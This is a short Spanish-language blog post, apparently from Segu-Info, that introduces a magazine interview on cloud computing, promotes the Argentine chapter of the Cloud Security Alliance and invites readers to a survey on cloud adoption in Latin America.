Durante la entrevista también he presentado el capítulo argentino de Cloud Security Alliance del cual tengo el placer de formar parte y al cual invito a participar si estas interesado en la tecnología de los próximos 10 años.
Finalmente te pido responder sólo cuatro preguntas sobre el tema para una encuesta que pronto publicaremos y esperamos sea el puntapié inicial para conocer más sobre el estado de Cloud Computing en América Latina: http://segu.info/encc
A continuación dejo la entrevista y agradezco a Alejandro por haber pensando en mí (Revista Information Technology (todos los derechos reservados):
Clic en la hoja para agrandar y leer
Cristian de la Redacción de Segu-Info